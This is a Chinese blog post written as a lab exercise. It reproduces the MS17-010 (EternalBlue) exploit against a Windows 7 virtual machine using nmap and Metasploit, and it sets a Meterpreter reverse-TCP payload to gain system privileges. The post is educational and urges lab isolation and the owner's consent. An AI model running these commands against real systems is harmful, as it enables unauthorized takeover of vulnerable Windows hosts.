01 攻防实验一:ms17-010(永恒之蓝)漏洞复现

影响范围

Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016

实验目的

利用已经披露的漏洞报告,复现微软 windows 7 系统利用 ms17-010 漏洞,获取系统最高权限

实验要求

获取目标主机的系统权限

实验环境

同一局域网下的两设备,为保证安全性,这里的两台设备采用的是虚拟机

实验设备

环境IP地址
目标主机windows 7192.168.3.121
攻击主机kali192.168.3.119

数据来源

目标主机提供

实验步骤

1. 切换管理员账户

sudo su

2. 端口扫描

使用 nmap 进行端口扫描,发现目标主机 445 端口开启,那么该主机下可能存在 ms17-010 漏洞。

nmap 192.168.1.121

3. 加载 ms17-010 攻击模块

msfconsole
use ms17-010

4. 对 445 端口进行漏洞扫

        4.1 加载扫描工具
use 3
        4.2 查看需要配置的参数
show options
        4.3 设置目标主机地址
set rhosts 192.168.3.121

        4.4 运行扫描,查看目标主机下是否存在该漏洞
run

5. 加载 ms17-010 攻击模块

检查发现该目标主机下存在该漏洞,加载攻击模块

use 0

6. 设置连接方式为反向连接

加载攻击模后,默认连接方式为反向连接

set payload windows/x64/meterpreter/reverse_tcp

7. 设置主机地址为目标主机

set rhosts 192.168.3.121

8. 攻击

run

实验结果

最后截图纪念

实验总结

这个漏洞是自己亲手做的第一个实验,对于自己本人来说,具有特殊意义。在这其中,需要注意以下几点

  1. 实验在 VMware 虚拟机环境下,尽量使用 NAT 网络,不要使用桥接模式
  2. 如果windows 7 中有杀毒软件,这个实验可能无法进行下去,因为杀毒软件可能已经这个漏洞修复
  3. 加载 ms17-010 攻击时,可以不用指定连接方式,因为默认就是反向连接
  4. 如果要攻击真实的物理机,一定要征求机主同意
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学习中进步

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值